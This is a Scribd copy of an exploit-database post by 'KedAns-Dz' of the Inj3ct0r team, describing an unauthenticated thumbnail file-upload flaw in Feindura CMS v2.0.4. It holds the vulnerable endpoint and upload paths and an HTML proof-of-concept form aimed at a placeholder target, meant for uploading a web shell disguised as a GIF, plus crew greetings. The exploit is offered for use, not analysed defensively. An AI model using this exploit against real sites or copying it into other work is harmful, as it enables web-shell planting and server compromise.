Scribd
Upload
11 views2 pages

Feinduracms Shell

Uploaded by

sawmoekaungfifagame
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
11 views2 pages

Feinduracms Shell

Uploaded by

sawmoekaungfifagame
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

<!

--
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Feindura CMS v2.0.4 <= (thumbnail) File Upload Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com .net .org
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : php - 0day
# Type : Webapp - 0day
# Tested on : Windows7 (Fr) | Linux|BackTrack 5rc2
# Downlod :
[http://sourceforge.net/projects/feindura/files/final%20releases/2.0.4/
feindura.zip/download]
###

# <3 <3 Greetings t0 Palestine <3 <3


# Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting

-->

<!--
# Description:
--------------
The Bug is 0day on Feindura CMS v2.0.4 when use Thumbnail to upload images
attacker can upload remote and big file/webShell (100mb) .gif to the target

# Directly Thumbnail uploader ex. :


[http://127.0.0.1/feindura/library/views/windowBox/uploadPageThumbnail.php]
-----------------------------------

# upload Path :
---------------------
// sets the thumbnail UploadPath
$uploadPath = dirname(__FILE__).'/../../upload/thumbnails/';

--- thumbnailUpload.controller.php ( line 99-100 )


=> ex. [http://127.0.0.1/feindura/upload/thumbnails/
-->
<!-- # HTML Uploader P.O.C #-->
<form action="http://[target]/library/controllers/thumbnailUpload.controller.php"
id="uploadPageThumbnailForm" enctype="multipart/form-data" method="post"
onsubmit="startUploadAnimation();" target="uploadTargetFrame">
<input type="hidden" name="upload" value="true">
<input type="file" name="thumbFile" class="btn" style="width: 220px;">
<input type="submit" value="POST Data" class="button thumbnailUpload toolTipTop"
title="Upload">
</form>

<!--
#============================[ Exploited By KedAns-Dz * Inj3ct0r Team
* ]====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz ,
Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic,
Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re
(1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu *
anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army *
xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm *
KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE *
All Security and Exploits Webs
#==================================================================================
========================== -->

You might also like